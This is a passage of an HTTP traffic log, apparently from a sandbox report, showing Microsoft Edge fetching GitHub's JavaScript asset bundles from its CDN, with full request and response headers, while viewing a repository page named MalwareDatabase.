sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Mon, 22 Apr 2024 01:46:30 GMT
etag: 0x8DC626E080E9D7B
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 873507
x-served-by: cache-iad-kiad7000164-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 72, 4602
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: b20e16efc720e49a5b1c1c57078bd5d08927d497
content-length: 4893
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_AnchoredOverlay_AnchoredOverlay_js-4c761b535add.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_primer_react_lib-esm_AnchoredOverlay_AnchoredOverlay_js-4c761b535add.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Fri, 03 May 2024 06:18:43 GMT
etag: 0x8DC6B38E20B094A
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 667077
x-served-by: cache-iad-kiad7000026-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 44, 4513
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 353d1a065615fa56b055f17ce975694ad68ad68b
content-length: 5070
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_react-router-dom_dist_index_js-2b1dbeadb6d4.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_react-router-dom_dist_index_js-2b1dbeadb6d4.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Fri, 12 Apr 2024 01:23:20 GMT
etag: 0x8DC5A8F237C15B6
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 520661
x-served-by: cache-iad-kiad7000061-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 41, 3975
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 349e88cfcee119e1b4d407cee8c4390f027fc47d
content-length: 3968
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_UnderlineNav_index_js-ef61f54e24f4.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_primer_react_lib-esm_UnderlineNav_index_js-ef61f54e24f4.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 16 Apr 2024 03:06:56 GMT
etag: 0x8DC5DC2461000AA
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 1874778
x-served-by: cache-iad-kjyo7100170-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 88, 4966
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 6cc0daa6d10f4e79dd08f69f4859f16b3abd0bf9
content-length: 3782
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Avatar_Avatar_js-node_modules_primer_react_lib-esm_-7f6456-ff35cd66fa9c.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_primer_react_lib-esm_Avatar_Avatar_js-node_modules_primer_react_lib-esm_-7f6456-ff35cd66fa9c.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 17 Apr 2024 14:26:18 GMT
etag: 0x8DC5EEA58953135
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 2191699
x-served-by: cache-iad-kcgs7200150-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 99, 7773
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 2fbf64d753df391806a9fec730bfa3933eb8e368
content-length: 4539
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_ActionMenu_ActionMenu_js-node_modules_primer_react_-028b5a-c5c4f2955fc6.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_primer_react_lib-esm_ActionMenu_ActionMenu_js-node_modules_primer_react_-028b5a-c5c4f2955fc6.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 30 Apr 2024 21:32:02 GMT
etag: 0x8DC695CF96A59AC
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 619350
x-served-by: cache-iad-kcgs7200094-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 14, 16419
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 00eb7ac180eb6cd394cc5e2cdc5f7c20b40ed73d
content-length: 4826
-
GEThttps://github.githubassets.com/assets/ui_packages_react-core_create-browser-history_ts-ui_packages_safe-storage_safe-storage_ts-ui_-682c2c-173099330e24.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/ui_packages_react-core_create-browser-history_ts-ui_packages_safe-storage_safe-storage_ts-ui_-682c2c-173099330e24.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Fri, 03 May 2024 06:18:43 GMT
etag: 0x8DC6B38E1F9B7A8
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 846757
x-served-by: cache-iad-kcgs7200084-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 43, 3970
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: a0a4a0784bc1f84a85d7d4d467771b195bf17dad
content-length: 15213
-
Remote address:185.199.108.154:443RequestGET /assets/ui_packages_paths_index_ts-922fee1fcbe0.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 04 Apr 2024 17:42:13 GMT
etag: 0x8DC54CE9008343A
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 2266970
x-served-by: cache-iad-kcgs7200049-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 54, 4555
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 8d175b72e70ca83fcd6641de9a513e3cce2a74d2
content-length: 6677
-
GEThttps://github.githubassets.com/assets/ui_packages_ref-selector_RefSelector_tsx-01bf310f9cb6.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/ui_packages_ref-selector_RefSelector_tsx-01bf310f9cb6.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 14 Dec 2023 17:45:36 GMT
etag: 0x8DBFCCC7AFA990F
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 520668
x-served-by: cache-iad-kjyo7100101-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 69, 4589
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: ce096da5128e95271404f7939c1c6d5cacb1971b
content-length: 3647
-
GEThttps://github.githubassets.com/assets/app_assets_modules_react-shared_hooks_use-canonical-object_ts-ui_packages_code-view-shared_ho-e725dc-2ace46dba7e0.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/app_assets_modules_react-shared_hooks_use-canonical-object_ts-ui_packages_code-view-shared_ho-e725dc-2ace46dba7e0.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 24 Oct 2023 17:57:34 GMT
etag: 0x8DBD4BAB3AB8E38
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 2815206
x-served-by: cache-iad-kcgs7200101-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 2733, 43505
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: cd3bdc06340092bda335b8ab3a7ae4649ac2eff2
content-length: 5317
-
Remote address:185.199.108.154:443RequestGET /assets/repos-overview-1a9ffb795115.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 05 Dec 2023 19:17:13 GMT
etag: 0x8DBF5C6C9ABE518
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 2442409
x-served-by: cache-iad-kjyo7100150-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 20, 43617
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 44d36da46d61304ce79142c04b114554a5d3e493
content-length: 3294
-
Remote address:185.199.108.154:443RequestGET /assets/wp-runtime-490e761b329f.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 27 Mar 2024 21:48:26 GMT
etag: 0x8DC4EA7A20B56D2
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 3253587
x-served-by: cache-iad-kiad7000056-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 95, 43950
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: b3fc64bfd868ae8a90081a1752f5a7f7f8bd8b3a
content-length: 5082
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_dompurify_dist_purify_js-13ee51630182.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_dompurify_dist_purify_js-13ee51630182.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 08 May 2024 21:12:05 GMT
etag: 0x8DC6FA3832B190E
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 344176
x-served-by: cache-iad-kiad7000125-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 18, 4557
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 4eebafea2e468b1f4e42022107389dd26a90c2db
content-length: 21973
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js-7bd350d761f4.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js-7bd350d761f4.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Mon, 13 May 2024 03:13:26 GMT
etag: 0x8DC72FAA83CE428
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 25818
x-served-by: cache-iad-kjyo7100122-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 14, 1201
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 29a620a8c318f5936f0583aa56f82d7ec9113ceb
content-length: 12742
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_smoothscroll-polyfill_dist_smoothscroll_js-node_modules_stacktrace-parse-a448e4-bb5415637fe0.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_smoothscroll-polyfill_dist_smoothscroll_js-node_modules_stacktrace-parse-a448e4-bb5415637fe0.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 25 Apr 2024 16:40:24 GMT
etag: 0x8DC654667EE6503
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 1224846
x-served-by: cache-iad-kjyo7100147-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 79, 7662
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: f8956b418594a84e3c35ee720400ef7651ec1496
content-length: 5739
-
Remote address:185.199.108.154:443RequestGET /assets/environment-b9fd6c57ed9b.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 09 May 2024 10:46:58 GMT
etag: 0x8DC701559D683F4
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 357023
x-served-by: cache-iad-kcgs7200141-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 29, 4012
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 1a4e376aad1fafa5999c68420843b5448a738f10
content-length: 24717
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-9f960d9b217c.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-9f960d9b217c.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Fri, 26 Apr 2024 21:56:33 GMT
etag: 0x8DC663BBCCAB63E
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 1453816
x-served-by: cache-iad-kjyo7100070-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 55, 38847
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 4796441a1d84f1b7d5e18ff2359dd191be8470fb
content-length: 8789
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_focus-zone_js-086f7a27bac0.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_primer_behaviors_dist_esm_focus-zone_js-086f7a27bac0.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 24 Oct 2023 17:57:35 GMT
etag: 0x8DBD4BAB420D672
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 3067894
x-served-by: cache-iad-kiad7000063-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 3957, 42940
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 1dc94358125df798bb71b671a10de88d1b0400be
content-length: 3584
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-c76945c5961a.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_github_relative-time-element_dist_index_js-c76945c5961a.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 13 Dec 2023 20:04:22 GMT
etag: 0x8DBFC16B2EB2DBF
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 3273512
x-served-by: cache-iad-kcgs7200056-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 87, 43087
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 8d4736b6e33092e686fde7a942b2b86fd73f9503
content-length: 3555
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_github_combobox-nav_dist_index_js-node_modules_github_markdown-toolbar-e-820fc0-bc8f02b96749.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_github_combobox-nav_dist_index_js-node_modules_github_markdown-toolbar-e-820fc0-bc8f02b96749.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 17 Apr 2024 15:39:48 GMT
etag: 0x8DC5EF49DA2EC4D
